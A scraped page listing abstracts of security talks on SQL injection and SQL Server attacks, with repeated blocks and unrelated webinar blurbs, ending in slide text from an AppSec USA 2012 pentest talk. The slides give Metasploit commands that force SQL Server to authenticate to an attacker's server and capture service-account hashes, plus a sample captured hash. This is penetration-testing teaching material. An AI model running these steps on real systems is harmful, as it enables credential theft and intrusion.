During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation.
This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building and testing detection capabilities will be a challenging task.
PurpleSharp is an open-source adversary simulation tool written in C# that executes adversary techniques against Windows environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection program. PurpleSharp executes different behavior across the attack lifecycle following the MITRE ATT&CK Framework’s tactics: execution, persistence, privilege escalation, credential access, lateral movement, etc.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
In this presentation I covered almost all basic details about SQL Injection. So you can get best knowledge about SQL Injection (SQLI).
This presentation contains animation so try out it on PC's.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally we?ll show how PowerShell automation can be used to execute the SQL Server attacks on scale. All scripts created and demonstrated during the presentation will be open sourced. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in IT security.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation.
This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection & response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building and testing detection capabilities will be a challenging task.
PurpleSharp is an open-source adversary simulation tool written in C# that executes adversary techniques against Windows environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection program. PurpleSharp executes different behavior across the attack lifecycle following the MITRE ATT&CK Framework’s tactics: execution, persistence, privilege escalation, credential access, lateral movement, etc.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
In this presentation I covered almost all basic details about SQL Injection. So you can get best knowledge about SQL Injection (SQLI).
This presentation contains animation so try out it on PC's.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally we?ll show how PowerShell automation can be used to execute the SQL Server attacks on scale. All scripts created and demonstrated during the presentation will be open sourced. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in IT security.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide an overview of common methods that can be used to obtain clear text credentials from Microsoft products such as Windows, IIS, and SQL Server. It also provides an overview of the proof of concept script used to recover MSSQL Linked Server passwords.
Relevant blog links have been provided below.
https://www.netspi.com/blog/entryid/215/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1
https://www.netspi.com/blog/entryid/226/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2
https://www.netspi.com/blog/entryid/221/decrypting-mssql-database-link-server-passwords
More security blogs by the authors can be found @
https://www.netspi.com/blog/
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
This presentation provides an overview off common adversarial emulation approaches along with attack and detection trends. It should be interesting to penetration testers and professionals in security operations roles.
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
This webcast will show you how to properly configure and deploy Memcached and Solr on Windows, including all the required Drupal integration. The webcast includes also instructions on proper configuration of your Drupal cron tasks for Solr indexing in conjunction with Windows Task Scheduler.
Caching and tuning fun for high scalabilityWim Godden
Caching has been a 'hot' topic for a few years. But caching takes more than merely taking data and putting it in a cache : the right caching techniques can improve performance and reduce load significantly. But we'll also look at some major pitfalls, showing that caching the wrong way can bring down your site. If you're looking for a clear explanation about various caching techniques and tools like Memcached, Nginx and Varnish, as well as ways to deploy them in an efficient way, this talk is for you.
A meticulous presentation on Authorization, Encryption & Authentication of the security features in MySQL 8.0 by Vignesh Prabhu, Database reliability engineer, Mydbops.
Caching and tuning fun for high scalabilityWim Godden
Caching has been a 'hot' topic for a few years. But caching takes more than merely taking data and putting it in a cache : the right caching techniques can improve performance and reduce load significantly. But we'll also look at some major pitfalls, showing that caching the wrong way can bring down your site. If you're looking for a clear explanation about various caching techniques and tools like Memcached, Nginx and Varnish, as well as ways to deploy them in an efficient way, this talk is for you.
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action reduce your anxiety!
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
During this presentation, we’ll talk about how to identify and triage the large volume of excessive access most standard Active Directory users have to common network shares. Over the course of hundreds of internal network penetration tests and audits one theme has stood out, vulnerability management programs do not adequately identify excessive share privileges. The excessive shares have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments. During this discussion, we will talk about why this gap exists, how to inventory excessive share across an entire Active Directory domain quickly, and how to triage those results to help reduce risk for your organization.
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. During this presentation, we will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
More information can be found at:
https://github.com/NetSPI/PowerUpSQL/wiki
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
Sections Updated for OWASP Meeting:
- SQL Server Link Crawling
- UNC path injection targets
- Command execution details
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
This presentation will cover 10 common weak SQL Server configurations and the practical attacks that help hackers gain unauthorized access to data, applications, and systems. This will include a few demonstrations of the techniques that are being used during real-world attacks and penetration tests. This should be interesting to developers, new database admins, and aspiring penetration testers looking to gain a better understanding of the risks associated with weak SQL Server configurations.
Full Video Presentation: http://youtu.be/SIeMz6gCK3Q
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.
This is the version modified for the OWASP meeting in June of 2014.
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. This talk includes real-world examples of attacks that they use on a daily basis, and some reflections on what techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers will all be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. Karl Fosaaen and I put this together for Secure 360 in Minneapolis. We hope you enjoy it.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will take a high level look at the malware life cycle and the role that both hackers and IT professionals play in it. It should be interesting to IT professionals as well as individuals interested in learning more about the general approach used by hackers to gain unauthorized access to systems, applications, and sensitive data.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
This presentation will provide a high level overview of the current role that desktop applications play in enterprise environments, and the general risks associated with different deployment models. It will also cover common methodologies, techniques, and tools used to identify vulnerabilities in typical desktop application implementations. Although there will be some technical content. The discussion should be interesting and accessible to both operational and management levels.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:
Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
1. SQL Server Exploitation, Escalation, and Pilfering
AppSec USA 2012
Authors:
Antti Rantasaari
Scott Sutherland
2. Who are we?
Antti Rantasaari
Scott Sutherland (@_nullbind)
What we do…
• Security consultants at NetSPI
• Pentesters
‒ Network
‒ Web
‒ Thick
• Researchers, bloggers, etc
• Pinball enthusiasts
3. What are we going to cover?
1. Database entry points
2. Domain user Database user
3. Database user OS admin
4. OS admin Database admin
5. Database admin OS admin
6. Finding sensitive data
7. Escalation: Service accounts
8. Escalation: Database Link Crawling
9. Conclusions
4. Why target SQL Servers?
Pentest Goal = Data Access
• It’s deployed everywhere
• Very few “exploits”, but it’s commonly
misconfigured
• Integrated with Windows and Active
Directory authentication
• Easy and stable to exploit
5. Why develop Metasploit tools?
• I suck at programming
• Easy to use framework
• Huge community support
• Easy management of code (GitHub)
• Easy distribution of code
http://www.metasploit.com/
https://github.com/rapid7/metasploit-framework
9. Privilege Inheritance: Summary
The “Domains Users” group is often
provided privileges to login into SQL
Servers…
Evil users just need to:
• Find SQL Servers
• Verify Access
• Attack!
12. Privilege Inheritance: Verify Access
Test current user’s access to SQL Servers with osql:
FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do
osql –E –S %i –Q “select ‘I have access
to:’+@@servername”
13. Privilege Inheritance: Verify Access
Test alternative user’s access to the SQL Servers with
the MSSQL_SQL Metasploit module:
msfconsole
use auxiliary/admin/mssql/mssql_sql
set RHOST <IP RANGE>
set RPORT <port>
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
Set SQL <query>
run
http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
17. SMB Capture/Relay: Summary
SQL Server supports functions that can access files via UNC
paths using the privileges of the SQL Server service account.
High level authentication process:
18. SMB Capture/Relay: Summary
Stored procedures with UNC support:
‒ *xp_dirtree
‒ *xp_fileexist
‒ xp_getfiledetails
Possible SMB authentication attacks:
Service Account Network Communication SMB Capture SMB Relay
LocalSystem Computer Account Yes No
NetworkService Computer Account Yes No
*Local Administrator Local Administrator Yes Yes
*Domain User Domain User Yes Yes
*Domain Admin Domain Admin Yes Yes
http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
20. SMB Capture: Start Sniffing for Hashes
Start Metasploit SMB capture module on your
evil server to capture seeded password hashes:
msfconsole
use auxiliary/server/capture/smb
set CAINPWFILE /root/cain_hashes.txt
set JOHNPWFILE /root/john_hashes.txt
exploit
http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
21. SMB Capture: Force MS SQL to Auth
Force SQL Server to authenticate with the modules:
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI
msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
Set SMBPROXY <evil server>
run
22. SMB Capture: Obtain Seeded Hashes
Obtaining service account hashes from the SQL
Server should look something like this:
DOMAIN: DEMO
USER: serviceaccount
LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25
NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e
http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
23. SMB Capture: Crack Hashes
1. Crack first half of recovered LANMAN hash
